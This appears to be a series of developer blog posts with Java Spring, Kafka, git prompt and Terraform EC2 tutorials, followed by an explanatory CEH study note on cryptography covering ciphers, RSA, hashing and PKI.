Add a header to Spring RestTemplate

Today, just a short code snippet. How to add a header to the ‘RestTemplate’ on Spring.

public class HeaderRequestInterceptor implements ClientHttpRequestInterceptor {

    private final String headerName;
    private final String headerValue;

    public HeaderRequestInterceptor(String headerName, String headerValue) {
        this.headerName = headerName;
        this.headerValue = headerValue;
    }

    @Override
    public ClientHttpResponse intercept(HttpRequest request, byte[] body, ClientHttpRequestExecution execution) throws IOException {
        request.getHeaders().set(headerName, headerValue);
        return execution.execute(request, body);
    }
}

Now, we add it to our ‘RestTemplate’:

List<ClientHttpRequestInterceptor> interceptors = new ArrayList<ClientHttpRequestInterceptor>();
interceptors.add(new HeaderRequestInterceptor("X-Custom-Header", "<custom_value>"));

RestTemplate restTemplate = new RestTemplate();
restTemplate.setInterceptors(interceptors);

And, that’s all.

Just an extra side note. As of Spring Framework 5, a new HTTP client called ‘WebClient’ has been added. It is assumed that ‘RestTemplate’ will be deprecated at some point. If we are starting a new application, specially if you are using the ‘WebFlux’ stack, it will be a better choice to use the new version.

Add a header to Spring RestTemplate

Git branch on terminal prompt

There are a lot of GUI tools to interact with git these days but, a lot of us, we are still using the terminal for that. One thing I have found very useful is, once you are in a folder with a git repository, to be able to see the branch in use on the terminal prompt. We can achieve this with a few steps.

Step 1

Let’s check the actual definition of our prompt. Mine looks something like:

echo $PS1
\[\e]0;\u@\h: \w\a\]\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]$

Step 2

Open with our favourite the file ‘~/.bashrc. In my case, ‘Vim’.

Step 3

Let’s create a small function to figure out the branch we are once we are on a folder with a git repository.

git_branch() {
  git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
}

Step 4

Let’s redefine the variable ‘PS1’ to include the function we have just defined. In addition, let’s add some colour to the branch name to be able to see it easily. Taking my initial values and adding the function call the result should be something like:

export PS1="\[\e]0;\u@\h: \w\a\]${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\] \[\033[00;32m\]\$(git_branch)\[\033[00m\]\$ "

And, it should look like:

Git branch on terminal prompt

Spring Application Events

Today, we are going to implement a simple example using spring application events.

Spring application events allow us to throw and listen to specific application events that we can process as we wish. Events are meant for exchanging information between loosely coupled components. As there is no direct coupling between publishers and subscribers, it enables us to modify subscribers without affecting the publishers and vice-versa.

To build our PoC and to execute it, we are going to need just a few classes. We will start with a basic Spring Boot project with the ‘web’ starter. And, once we have that in place (you can use the Spring Initializr) we can start adding our classes.

Let’s start with a very basic ‘User’ model

public class User {

    private String firstname;
    private String lastname;

    public String getFirstname() {
        return firstname;
    }

    public User setFirstname(String firstname) {
        this.firstname = firstname;
        return this;
    }

    public String getLastname() {
        return lastname;
    }

    public User setLastname(String lastname) {
        this.lastname = lastname;
        return this;
    }

    @Override
    public String toString() {
        return "User{" +
                "firstname='" + firstname + '\'' +
                ", lastname='" + lastname + '\'' +
                '}';
    }
}

Nothing out of the ordinary here. Just a couple of properties and some getter and setter methods.

Now, let’s build a basic service that is going to simulate a ‘register’ operation:

...
import org.springframework.context.ApplicationEventPublisher;
...

@Service
public class UserService {

    private static final Logger logger = LoggerFactory.getLogger(UserService.class);

    private final ApplicationEventPublisher publisher;

    public UserService(ApplicationEventPublisher publisher) {
        this.publisher = publisher;
    }

    public void register(final User user) {
        logger.info("Registering {}", user);

        publisher.publishEvent(new UserRegistered(user));
    }
}

Here we have the first references to the event classes the Spring Framework offers us. The ‘ApplicationEventPublished’ that it will allow us to publish the desired event to be consumer by listeners.

The second reference we are going to have to the events framework is when we create and event class we are going to send. In this case, the class ‘UserRegistered’ we can see on the publishing line above.

...
import org.springframework.context.ApplicationEvent;

public class UserRegistered extends ApplicationEvent {

    public UserRegistered(User user) {
        super(user);
    }
}

As we can see, extending the class ‘ApplicationEvent’ we have very easily something we can publish and listen to it.

Now. let’s implements some listeners. The first of them is going to be one implementing the class ‘ApplicationListener’ and, the second one, it is going to be annotation based. Two simple options offered by Spring to build our listeners.

...
import org.springframework.context.ApplicationListener;
import org.springframework.context.event.EventListener;
import org.springframework.stereotype.Component;

public class UserListeners {

    // Technical note: By default listener events return 'void'. If an object is returned, it will be published as an event

    /**
     * Example of event listener using the implementation of {@link ApplicationListener}
     */
    static class RegisteredListener implements ApplicationListener<UserRegistered> {

        private static final Logger logger = LoggerFactory.getLogger(RegisteredListener.class);

        @Override
        public void onApplicationEvent(UserRegistered event) {
            logger.info("Registration event received for {}", event);
        }
    }

    /**
     * Example of annotation based event listener
     */
    @Component
    static class RegisteredAnnotatedListener {

        private static final Logger logger = LoggerFactory.getLogger(RegisteredAnnotatedListener.class);

        @EventListener
        void on(final UserRegistered event) {
            logger.info("Annotated registration event received for {}", event);
        }
    }
}

As we can see, very basic stuff. It is worth it to mention the ‘Technical note’. By default, the listener methods return ‘void’, they are initially design to received an event, do some stuff and finish. But, obviously, they can at the same time publish some messages, we can achieve this easily, returning an object. The returned object will be published as any other event.

Once we have all of this, let’s build a simple controller to run the process:

@RestController
@RequestMapping("/api/users")
public class UserController {

    private final UserService userService;

    public UserController(UserService userService) {
        this.userService = userService;
    }

    @GetMapping
    @ResponseStatus(HttpStatus.CREATED)
    public void register(@RequestParam("firstname") final String firstname,
                         @RequestParam("lastname") final String lastname) {
        Objects.requireNonNull(firstname);
        Objects.requireNonNull(lastname);

        userService.register(new User().setFirstname(firstname).setLastname(lastname));
    }
}

Nothing out of the ordinary, simple stuff.

We can invoke the controller with any tools we want but, a simple way, it is using cURL.

curl -X GET "http://localhost:8080/api/users?firstname=john&lastname=doe"

Once we call the endpoint, we can see the log messages generated by the publisher and the listeners:

Registering User{firstname='john', lastname='doe'}
Annotated registration event received for dev.binarycoders.spring.event.UserRegistered
Registration event received for dev.binarycoders.spring.event.UserRegistered

As we can see, the ‘register’ action is executed and it publishes the event and, both listeners, the annotated and the implemented, receive and process the message.

As usual you can find the source for this example here, in the ‘spring-events’ module.

For some extra information, you can take a look at one of the videos of the last SpringOne.

Spring Application Events

Spring Boot with Kafka

Today we are going to build a very simple demo code using Spring Boot and Kafka.

The application is going to contain a simple producer and consumer. In addition, we will add a simple endpoint to test our development and configuration.

Let’s start.

The project is going to be using:

  • Java 14
  • Spring Boot 2.3.4

A good place to start generating our project is Spring Initialzr. There we can create easily the skeleton of our project adding some basic information about our project. We will be adding two dependencies:

  • Spring Web.
  • Spring for Apache Kafka.
  • Spring Configuration Processor (Optional).

Once we are done filling the form we only need to generate the code and open it on our favourite code editor.

As an optional dependency, I have added the “Spring Boot Configuration Processor” dependency to be able to define some extra properties that we will be using on the “application.properties” file. As I have said is optional, we are going to be able to define and use the properties without it but, it going to solve the warning of them not been defined. Up to you.

Whit the three dependencies, our “pom.xml” should look something like:

<dependency>
  <groupId>org.springframework.boot</groupId>
  <artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
  <groupId>org.springframework.kafka</groupId>
  <artifactId>spring-kafka</artifactId>
</dependency>
<dependency>
  <groupId>org.springframework.boot</groupId>
  <artifactId>spring-boot-configuration-processor</artifactId>
  <optional>true</optional>
</dependency>

The next step is going to be creating our kafka producer and consumer to be able to send a message using the distributed event streaming platform.

For the producer code we are just going to create a basic method to send a message making use of the “KafkaTemplate” offered by Spring.

@Service
public class KafkaProducer {
    public static final String TOPIC_NAME = "example_topic";

    private final KafkaTemplate<String, String> kafkaTemplate;

    public KafkaProducer(KafkaTemplate<String, String> kafkaTemplate) {
        this.kafkaTemplate = kafkaTemplate;
    }

    public void send(final String message) {
        kafkaTemplate.send(TOPIC_NAME, message);
    }
}

The consumer code is going to be even more simple thanks to the “KafkaListener” provided by Spring.

@Service
public class KafkaConsumer {

    @KafkaListener(topics = {KafkaProducer.TOPIC_NAME}, groupId = "example_group_id")
    public void read(final String message) {
        System.out.println(message);
    }
}

And finally, to be able to test it, we are going to define a Controller to invoke the Kafka producer.

@RestController
@RequestMapping("/kafka")
public class KafkaController {

    private final KafkaProducer kafkaProducer;

    public KafkaController(KafkaProducer kafkaProducer) {
        this.kafkaProducer = kafkaProducer;
    }

    @PostMapping("/publish")
    public void publish(@RequestBody String message) {
        Objects.requireNonNull(message);

        kafkaProducer.send(message);
    }
}

With this, all the necessary code is done. Let’s now go for the configuration properties and the necessary Docker images to run all of this.

First, the “application.properties” file. It is going to contain some basic configuration properties for the producer and consumer.

server.port=8081

spring-boot-kafka.config.kafka.server=localhost
spring-boot-kafka.config.kafka.port=9092

# Kafka consumer properties
spring.kafka.consumer.bootstrap-servers=${spring-boot-kafka.config.kafka.server}:${spring-boot-kafka.config.kafka.port}
spring.kafka.consumer.group-id=example_group_id
spring.kafka.consumer.auto-offset-reset=earliest
spring.kafka.consumer.key-deserializer=org.apache.kafka.common.serialization.StringDeserializer
spring.kafka.consumer.value-deserializer=org.apache.kafka.common.serialization.StringDeserializer

# kafka producer properties
spring.kafka.producer.bootstrap-servers=${spring-boot-kafka.config.kafka.server}:${spring-boot-kafka.config.kafka.port}
spring.kafka.producer.key-serializer=org.apache.kafka.common.serialization.StringSerializer
spring.kafka.producer.value-serializer=org.apache.kafka.common.serialization.StringSerializer

In the line 8, we can see the property “spring.kafka.consumer.group-id”. If we look carefully at it, we will see that it match the previous definition of the “groupId” we have done on the consumer.

Lines 10, 11 and 15, 16 define the serialization and de-serialization classes.

Finally, in the list 3 and 4 we have defined a couple of properties to avoid repetition. This are the properties that are showing us a warning message.

To fix it, if we have previously added the “Spring Configuration Processor” dependency, now, we can add the file:

spring-boot-kafka/src/main/resources/META-INF/additional-spring-configuration-metadata.json

With the definition of this properties:

{
  "properties": [
    {
      "name": "spring-boot-kafka.config.kafka.server",
      "type": "java.lang.String",
      "description": "Location of the Kafka server."
    },
    {
      "name": "spring-boot-kafka.config.kafka.port",
      "type": "java.lang.String",
      "description": "Port of the Kafka server."
    }
  ]
}

We are almost there. The only thing remaining is the Apache Kafka. Because we do not want to deal with the complexity of setting an Apache Kafka server, we are going to leverage the power of Docker and create a “docker-compose” file to run it for us:

version: '3'

services:
  zookeeper:
    image: wurstmeister/zookeeper
    ports:
      - 2181:2181
    container_name: zookepper

  kafka:
    image: wurstmeister/kafka
    ports:
      - 9092:9092
    environment:
      KAFKA_ADVERTISED_HOST_NAME: localhost
      KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
      KAFKA_CREATE_TOPIC: "example_topic:1:3"

As we can see, simple stuff, nothing out of the ordinary. Two images, one for Zookepper and one for Apache Kafka, the definition of some ports (remember to match them with the ones in the application.propeties file) and a few variables need for the Apache Kafka image.

With this, we can run the docker-compose file and obtain two containers running:

Now, we can test the end point we have built previously. In this case, to make it simple, we are going to use curl:

`curl -d '{"message":"Hello from Kafka!}' -H "Content-Type: application/json" -X POST http://localhost:8081/kafka/publish`

The result should be something like:

And, this is all. You can find the full source code here.

Enjoy it!

Spring Boot with Kafka

Terraform: EC2 + Apache

Today, let’s do some hands-on. We are going to have a (very) short introduction to terraform and, in addition to some commands we are going to deploy in AWS an EC2 instance with a running Apache Server.

It is assumed the reader have some basic AWS knowledge for this article because the different components created on AWS and the reason they are created is not in the scope of this small demo. If you, as a reader, do not have any previous knowledge on AWS, you can still follow the demo and take advantage to learn of the few basic components of AWS and, one of the most basic architectures.

We are going to be using the version 0.12.29 of Terraform for this small demo.

Terraform is a tool that allows us to specify, provision and manage our infrastructure and run it on the most popular providers. It is one tool that embraces the principle of Infrastructure as a Code.

Some basic commands we will we using during this article are:

  • init: The ‘terraform init‘ command is used to initialize a working directory containing Terraform configuration files. This is the first command that should be run after writing a new Terraform configuration or cloning an existing one from version control. It is safe to run this command multiple times.
  • validate: The ‘terraform validate‘ command validates the configuration files in a directory, referring only to the configuration and not accessing any remote services such as remote state, provider APIs, etc.
  • plan: The ‘terraform plan‘ command is used to create an execution plan. Terraform performs a refresh, unless explicitly disabled, and then determines what actions are necessary to achieve the desired state specified in the configuration files.
  • apply: The ‘terraform apply‘ command is used to apply the changes required to reach the desired state of the configuration or the pre-determined set of actions generated by a terraform plan execution plan. A specific resource can be addressed with the flag ‘-target‘.
  • destroy: The ‘terraform destroy‘ command is used to destroy the Terraform-managed infrastructure. A specific resource can be addressed with the flag ‘-target‘.

Option ‘–auto-approve‘ skips the confirmation (yes).

The infrastructure we are going to need to deploy in AWS our Apache server is going to be:

  1. Create a VPC
  2. Create an internet gateway
  3. Create a custom route table
  4. Create a subnet
  5. Associate the subnet with the routeing table
  6. Create a security group to allow ports 22, 80, 443
  7. Create a network interface with IP in the subnet
  8. Assign an elastic IP to the network interface
  9. Create an Ubuntu server and install/enable Apache 2

Let’s build our infrastructure now.

First thing we need to do is to define our provider. In this case, AWS.

# Configure the AWS Provider
provider "aws" {
  version = "~> 2.70"
  # Optional
  region  = "eu-west-1"
}

Now, we can start to follow the steps defined previously:

# 1. Create a VPC
resource "aws_vpc" "pr03-vpc" {
  cidr_block = "10.0.0.0/16"

  tags = {
    Name = "pr03-vpc"
  }
}

Here, we are creating a VPC and assigning a range of IPs.

# 2. Create an internet gateway
resource "aws_internet_gateway" "pr03-gw" {
  vpc_id = aws_vpc.pr03-vpc.id

  tags = {
    Name = "pr03-gw"
  }
}

In this step, we are defining our Internet Gateway and attach it to the created VPC.

# 3. Create a custom route table
resource "aws_route_table" "pr03-r" {
  vpc_id = aws_vpc.pr03-vpc.id

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = aws_internet_gateway.pr03-gw.id
  }

  route {
    ipv6_cidr_block = "::/0"
    gateway_id      = aws_internet_gateway.pr03-gw.id
  }

  tags = {
    Name = "pr03-r"
  }
}

Now, we need to allow the traffic to arrive at our gateway. In this case, we are creating an entry for the IPv4 and one for the IPv6.

# 4. Create a subnet
resource "aws_subnet" "pr03-subnet-1" {
  vpc_id            = aws_vpc.pr03-vpc.id
  cidr_block        = "10.0.1.0/24"
  availability_zone = "eu-west-1a"

  tags = {
    Name = "pr03-subnet-1"
  }
}

In this step, we are creating a subnet in our VPC where our server will live.

# 5. Associate the subnet with the route table
resource "aws_route_table_association" "pr03-a" {
  subnet_id      = aws_subnet.pr03-subnet-1.id
  route_table_id = aws_route_table.pr03-r.id
}

And, we need to associate the subnet with the routing table.

# 6. Create a security group to allow ports 22, 80, 443
resource "aws_security_group" "pr03-allow_web_traffic" {
  name        = "allow_web_traffic"
  description = "Allow web traffic"
  vpc_id      = aws_vpc.pr03-vpc.id

  ingress {
    description = "SSH"
    from_port   = 22
    to_port     = 22
    protocol    = "tcp"
    # We want internet to access it
    cidr_blocks = ["0.0.0.0/0"]
  }

  ingress {
    description = "HTTP"
    from_port   = 80
    to_port     = 80
    protocol    = "tcp"
    # We want internet to access it
    cidr_blocks = ["0.0.0.0/0"]
  }

  ingress {
    description = "HTTPS"
    from_port   = 443
    to_port     = 443
    protocol    = "tcp"
    # We want internet to access it
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  tags = {
    Name = "pr03-allow_web_traffic"
  }
}

Now, it is time to create our security group to guarantee only the ports we want are accessible and nothing else. In this specific case, the ports are going to be 22, 80 and 443 for incoming traffic and, we are going to allow all exiting traffic.

# 7. Create a network interface with an ip in the subnet
resource "aws_network_interface" "pr03-nic" {
  subnet_id       = aws_subnet.pr03-subnet-1.id
  private_ips     = ["10.0.1.50"]
  security_groups = [aws_security_group.pr03-allow_web_traffic.id]
}

The next step, it is to create a network interface in our subnet.

# 8. Assign an elastic IP to the network interface
resource "aws_eip" "pr03-eip" {
  vpc                       = true
  network_interface         = aws_network_interface.pr03-nic.id
  associate_with_private_ip = "10.0.1.50"
  depends_on                = [aws_internet_gateway.pr03-gw]
}

And, we associate to the network interface an Elastic IP to make de server reachable from the Internet.

# 9. Create an Ubuntu server and install/enable Apache 2
resource "aws_instance" "pr03-web_server" {
  ami               = "ami-099926fbf83aa61ed"
  instance_type     = "t2.micro"
  availability_zone = "eu-west-1a"
  key_name          = "terraform-tutorial"

  network_interface {
    device_index         = 0
    network_interface_id = aws_network_interface.pr03-nic.id
  }

  # Install Apache 2
  user_data = <<-EOF
              #!/bin/bash
              sudo apt update -y
              sudo apt install apache2 -y
              sudo systemctl start apache2
              sudo bash -c 'echo your very first web server > /var/www/html/index.html'
              EOF

  tags = {
    Name = "pr03-web_server"
  }
}

Almost the last step is to create our ubuntu server and install out Apache service.

Finally, we are going to add a few outputs to check some of the resultant information after the execution has been completed. Just to double-check everything has worked without the need to go to the AWS Console:

# Print the elastic IP when execution finishes
output "server_public_ip" {
  value = aws_eip.pr03-eip.public_ip
}

# Print the private IP of the server when execution finishes
output "server_private_ip" {
  value = aws_instance.pr03-web_server.private_ip
}

# Print the ID of the server when execution finishes
output "server_id" {
  value = aws_instance.pr03-web_server.id
}

With all of this created, we can starting to execute terraform commands.

  1. terraform init: This will initialise terraform.
  2. terraform plan: It will show us what actions are going to be executed.
  3. terraform apply –auto-approve: It will execute our changes in AWS.

If you have been following along these steps, once the terraform apply command has been executed we will see something like:

Execution result

Now, we can check on the AWS Console our different components are there and, we can check, using the public IP, the Apache service is running.

In theory, everything we have deployed on AWS, if you have followed all the steps, belongs to the AWS Free Tier but, just in case, and to avoid any costs, let’s take down now our infrastructure. For this, we will execute the terraform destroy command:

terraform destroy –auto-approve

The code for this demo can be found here.

Terraform: EC2 + Apache

CEH (XXI): Cryptography

The index of this series of articles can be found here.

Confidentiality, integrity and availability are the three basic components around which we should build and maintain our security model. Encryption is one of the tools we have available to achieve this and it can help us to make communications safer and ensure that only the sender and receiver can read clear text data.

Cryptography Concepts

Cryptography

Cryptography is the study of secure communications techniques that allow only the sender and intended recipient of a message to view its contents. The term is derived from the Greek word kryptos, which means hidden. It is closely associated with encryption, which is the act of scrambling ordinary text into what is known as ciphertext and then back again upon arrival. In addition, cryptography also covers the obfuscation of information in images using techniques such as microdots or merging. Ancient Egyptians were known to use these methods in complex hieroglyphics, and Roman Emperor Julius Caesar is credited with using one of the first modern cyphers.

The objective of cryptography is not only confidentiality, but it also includes integrity, authentication and non-repudiation.

Types of Cryptography

Symmetric Cryptography

Symmetric key algorithms are those which use a single set of keys for both encryption and decryption of data. This key is generally a shared secret between multiple parties who want to encrypt or decrypt the data.

Most widely used symmetric cyphers are AES and DES.

Symmetric encryption

Asymmetric Cryptography / Public Key Cryptography

Asymmetric cryptography, also known as public-key cryptography, is a process that uses a pair of related keys, one public key and one private key, to encrypt and decrypt a message and protect it from unauthorized access or use. A public key is a cryptographic key that can be used by any person to encrypt a message so that it can only be deciphered by the intended recipient with their private key. A private key, also known as a secret key, is shared only with key’s initiator.

Many protocols rely on asymmetric cryptography, including the transport layer security (TLS) and secure sockets layer (SSL) protocols, which make HTTPS possible. The encryption process is also used in software programs such as browsers that need to establish a secure connection over an insecure network like the Internet or need to validate a digital signature.

RSA, DSA and Diffie-Hellman algorithm are popular examples of asynchronous cyphers.

Usually, private keys are known only by the owner and public keys are issued by using a Public Key Infrastructure (PKI) where a trusted Certification Authority certifies the ownership of the key pairs.

Asymmetric encryption

Government Access to Keys

By the Government Access to Keys (GAK) schema, software companies will give copies of all keys to the government and the government promises that they will hold on to the keys in a secure way, and will only use them when a court issues a warrant to do so.

Encryption Algorithms

A cypher is a set of rules by which we implement encryption. Thousands of cyphers algorithms are available on the Internet. Some of them are proprietary while others are open source. Common methods by which cyphers replace original data with encrypted data are:

Substitution

The simple substitution cypher is a cypher that has been in use for many hundreds of years (an excellent history is given in Simon Singhs ‘the Code Book’). It basically consists of substituting every plaintext character for a different ciphertext character. It differs from the Caesar cypher in that the cypher alphabet is not simply the alphabet shifted, it is completely jumbled.

The simple substitution cypher offers very little communication security, and it will be shown that it can be easily broken even by hand, especially as the messages become longer (more than several hundred ciphertext characters).

Polyalphabetic

The development of Polyalphabetic Substitution Ciphers was the cryptographers answer to Frequency Analysis. The first known polyalphabetic cypher was the Alberti Cipher invented by Leon Battista Alberti in around 1467. He used a mixed alphabet to encrypt the plaintext, but at random points he would change to a different mixed alphabet, indicating the change with an uppercase letter in the ciphertext. In order to utilise this cypher, Alberti used a cypher disc to show how plaintext letters are related to ciphertext letters.

Alberti cypher disc

Stream Cypher

A stream cypher is an encryption algorithm that encrypts 1 bit or byte of plaintext at a time. It uses an infinite stream of pseudorandom bits as the key. For a stream cypher implementation to remain secure, its pseudorandom generator should be unpredictable and the key should never be reused. Stream cyphers are designed to approximate an idealized cypher, known as the One-Time Pad.

The One-Time Pad, which is supposed to employ a purely random key, can potentially achieve “perfect secrecy”. That is, it is supposed to be fully immune to brute force attacks. The problem with the one-time pad is that, in order to create such a cypher, its key should be as long or even longer than the plaintext.

Popular Stream Cyphers

  • RC4: Rivest Cipher 4 (RC4) is the most widely used of all stream cyphers, particularly in software. It is also known as ARCFOUR or ARC4. RC4 stream cyphers have been used in various protocols like WEP and WPA (both security protocols for wireless networks) as well as in TLS. Unfortunately, recent studies have revealed vulnerabilities in RC4, prompting Mozilla and Microsoft to recommend that it be disabled where possible. In fact, RFC 7465 prohibits the use of RC4 in all versions of TLS. There are newer version RC5 and RC6.

Block Cipher

A block cypher is an encryption algorithm that encrypts a fixed size of n-bits of data, known as a block, at one time. The usual sizes of each block are 64 bits, 128 bits, and 256 bits. So for example, a 64-bit block cypher will take in 64 bits of plaintext and encrypt it into 64 bits of ciphertext. In cases where bits of plaintext is shorter than the block size, padding schemes are called into play. Majority of the symmetric cyphers used today are actually block cyphers. DES, Triple DES, AES, IDEA, and Blowfish are some of the commonly used encryption algorithms that fall under this group.

Popular Block Cyphers

  • DES: Data Encryption Standard (DES) used to be the most popular block cypher in the world and was used in several industries. It is still popular today, but only because it is usually included in historical discussions of encryption algorithms. The DES algorithm became a standard in the US in 1977. However, it is already been proven to be vulnerable to brute force attacks and other cryptanalytic methods. DES is a 64-bit cypher that works with a 64-bit key. Actually, 8 of the 64 bits in the key are parity bits, so the key size is technically 56 bits long.
  • 3DES: As its name implies, 3DES is a cypher based on DES. It is practically DES that is run three times. Each DES operation can use a different key, with each key being 56 bits long. Like DES, 3DES has a block size of 64 bits. Although 3DES is many times stronger than DES, it is also much slower (about 3x slower). Because many organizations found 3DES to be too slow for many applications, it never became the ultimate successor of DES.
  • AES: A US Federal Government standard since 2002, AES or Advanced Encryption Standard is arguably the most widely used block cypher in the world. It has a block size of 128 bits and supports three possible key sizes: 128, 192, and 256 bits. The longer the key size, the stronger the encryption. However, longer keys also result in longer processes of encryption.
  • Blowfish: This is another popular block cypher (although not as widely used as AES). It has a block size of 64 bits and supports a variable-length key that can range from 32 to 448 bits. One thing that makes blowfish so appealing is that Blowfish is unpatented and royalty-free.
  • Twofish: This cypher is related to Blowfish but it is not as popular. It is a 128-bit block cypher that supports key sizes up to 256 bits long.

DSA and Related Signature Schemes

The DSA algorithm works in the framework of public-key cryptosystems and is based on the algebraic properties of modular exponentiation, together with the discrete logarithm problem, which is considered to be computationally intractable. The algorithm uses a key pair consisting of a public key and a private key. The private key is used to generate a digital signature for a message, and such a signature can be verified by using the signer’s corresponding public key. The digital signature provides message authentication (the receiver can verify the origin of the message), integrity (the receiver can verify that the message has not been modified since it was signed) and non-repudiation (the sender cannot falsely claim that they have not signed the message).

A digital certificate contains various items that are:

  • Subject: Certificate’s holder name.
  • Serial Number: Unique number to identify the certificate.
  • Public key: A public copy of the public key of the certificate holder.
  • Issuer: Certificate issuing authority’s digital signature to verify that the certificate is real.
  • Signature algorithm: Algorithm used to digitally sign a certificate by the Certification Authority (CA).
  • Validity: Validity of a certificate mark by expiration date and time.

RSA

RSA is an encryption algorithm, used to securely transmit messages over the internet. It is based on the principle that it is easy to multiply large numbers, but factoring large numbers is very difficult. For example, it is easy to check that 31 and 37 multiply to 1147, but trying to find the factors of 1147 is a much longer process.

RSA is an example of public-key cryptography, which is illustrated by the following example: Suppose Alice wishes to send Bob a valuable diamond, but the jewel will be stolen if sent unsecured. Both Alice and Bob have a variety of padlocks, but they don’t own the same ones, meaning that their keys cannot open the other’s locks.

In RSA, the public key is generated by multiplying two large prime numbers p and q together, and the private key is generated through a different process involving p and q. A user can then distribute his public key pq, and anyone wishing to send the user a message would encrypt their message using the public key. For all practical purposes, even computers cannot factor large numbers into the product of two primes, in the same way, that factoring a number like 414863 by hand is virtually impossible.

The implementation of RSA makes heavy use of modular arithmetic, Euler’s theorem, and Euler’s totient function. Notice that each step of the algorithm only involves multiplication, so it is easy for a computer to perform:

  1. First, the receiver chooses two large prime numbers p and q. Their product, n = pq, will behalf of the public key.
  2. The receiver calculates ϕ(pq) = (p−1)(q−1) and chooses a number e relatively prime to ϕ(pq). In practice, e is often chosen to be (2^16) + 1 = 65537, though it can be as small as 3 in some cases. e will be the other half of the public key.
  3. The receiver calculates the modular inverse d of e modulo ϕ(n). In other words, de ≡ 1(modϕ(n)). d is the private key.
  4. The receiver distributes both parts of the public key: n and e. d is kept secret.

Now that the public and private keys have been generated, they can be reused as often as wanted. To transmit a message, follow these steps:

  1. First, the sender converts his message into a number m. One common conversion process uses the ASCII alphabet:
    1. For example, the message “HELLO” would be encoded as 7269767679. It is important that m<n, as otherwise the message will be lost when taken modulo n, so if n is smaller than the message, it will be sent in pieces.
  2. The sender then calculates c ≡ m^e (mod n). c is the ciphertext or the encrypted message. Besides the public key, this is the only information an attacker will be able to steal.
  3. The receiver computes c^d ≡ m(modn), thus retrieving the original number m.
  4. The receiver translates m back into letters, retrieving the original message.

Note that step 3 makes use of Euler’s theorem.

ASCII table for step 1.

Message Digest (One-Way Hash) Functions

A message digest is a cryptographic hash function containing a string of digits created by a one-way hashing formula.

Message digests are designed to protect the integrity of a piece of data or media to detect changes and alterations to any part of a message. They are a type of cryptography utilizing hash values that can warn the copyright owner of any modifications applied to their work.

Message digest hash numbers represent specific files containing the protected works. One message digest is assigned to particular data content. It can reference a change made deliberately or accidentally, but it prompts the owner to identify the modification as well as the individual(s) making the change. Message digests are algorithmic numbers.

This term is also known as a hash value and sometimes as a checksum.

The message digest is a unique fixed-size bit string that is calculated in a way that if a single bit is modified, it will change fifty per cent of the message digest value.

Message Digest Function (MD5)

The MD5 function is a cryptographic algorithm that takes an input of arbitrary length and produces a message digest that is 128 bits long. The digest is sometimes also called the “hash” or “fingerprint” of the input. MD5 is used in many situations where a potentially long message needs to be processed and/or compared quickly. The most common application is the creation and verification of digital signatures.

MD5 was designed by well-known cryptographer Ronald Rivest in 1991. In 2004, some serious flaws were found in MD5. The complete implications of these flaws have yet to be determined.

Secure Hashing Algorithm (SHA)

Secure Hash Algorithms (SHA) are a family of cryptographic functions designed to keep data secured. It works by transforming the data using a hash function: an algorithm that consists of bitwise operations, modular additions, and compression functions. The hash function then produces a fixed-size string that looks nothing like the original. These algorithms are designed to be one-way functions, meaning that once they are transformed into their respective hash values, it is virtually impossible to transform them back into the original data. A few algorithms of interest are SHA-1, SHA-2, and SHA-3, each of which was successively designed with increasingly stronger encryption in response to hacker attacks. SHA-0, for instance, is now obsolete due to the widely exposed vulnerabilities.

SHA-1 produces 160-bits hashing values. SHA-2 is a group of different hashing including SHA-256, SHA-384 and SHA-512

Hashed Message Authentication Code (HMAC)

A hashed message authentication code (HMAC) is a message authentication code that makes use of a cryptographic key along with a hash function. The actual algorithm behind a hashed message authentication code is complicated, with hashing being performed twice. This helps in resisting some forms of cryptographic analysis. A hashed message authentication code is considered to be more secure than other similar message authentication codes, as the data transmitted and key used in the process are hashed separately.

Secure Shell (SSH)

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Typical applications include remote command-line, login, and remote command execution, but any network service can be secured with SSH.

SSH provides a secure channel over an unsecured network by using client-server architecture, connecting an SSH client application with an SSH server. The protocol specification distinguishes between two major versions, referred to as SSH-1 and SSH-2. The standard TCP port for SSH is 22.

Secure shell protocol consist of three major components:

  • The Transport Layer Protocol (SSH-TRANS) provides server authentication, confidentiality and integrity. It may optionally also provide compression. The transport layer will typically run over a TCP/IP connection, but might also run of any other reliable data stream.
  • The User Authentication Protocol (SSH-USERAUTH) authenticates the client-side user to the server. It runs over the transport layer protocol.
  • The Connection Protocol (SSH-CONNECT) multiplexes the encrypted tunnel into several logical channels. It runs over the user authentication protocol.

Public Key Infrastructure

Public Key Infrastructure (PKI) is a combination of policies, procedures, hardware, software and people that are required to create, manage and revoke digital certificates.

Public and Private Key Pair

Public and private keys work as a pair to enforce the encryption and decryption process. The public key can be provided to anyone and the private key must be kept it secret.

Both encryption/decryptions are valid, using the public key to encrypt and the private key to decrypt or the opposite, where the private key is used for encryption and the public key for decryption. Both ways have different applications.

Certification Authorities

Certification Authorities (CA) is a computer or entity that creates and issues digital certificates. Information like IP address, fully qualified domain name and the public key are present on these certificates. CAs also assign serial numbers to the digital certificates and sign the certificate with its digital signature.

Root Certificate

Root certificates provide the public key and other details of CAs. Different OS store root certificates in different ways.

Identity Certificate

The purpose of identity certificates is similar to root certificates but they cover client computers or devices. For example, a router or a web server that want to make SSL connections with other peers.

Signed Certificate Vs. Self-Signed Certificate

A self-signed certificate is a public key certificate that is signed and validated by the same person. It means that the certificate is signed with its own private key and is not relevant to the organization or person identity that does sign process.

A signed certificate is supported by a reputable third-party certificate authority (CA). The issue of a signed certificate requires verification of domain ownership, legal business documents, and other essential technical perspectives. To establish a certificate chain, certificate authority also itself issues a certificate a root certificate.

Email Encryption

Digital Signature

The digital signature is used to validate the authenticity of digital documents. Digital signatures ensure the author of the document, the date and time of signing and authenticate the content of the message.

There are two categories of digital signatures:

  • Direct digital signature: The Direct Digital Signature is only include two parties one to send a message and another one to receive it. According to direct digital signature both parties trust each other and knows there public key. The message are prone to get corrupted and the sender can declines about the message sent by him any time.
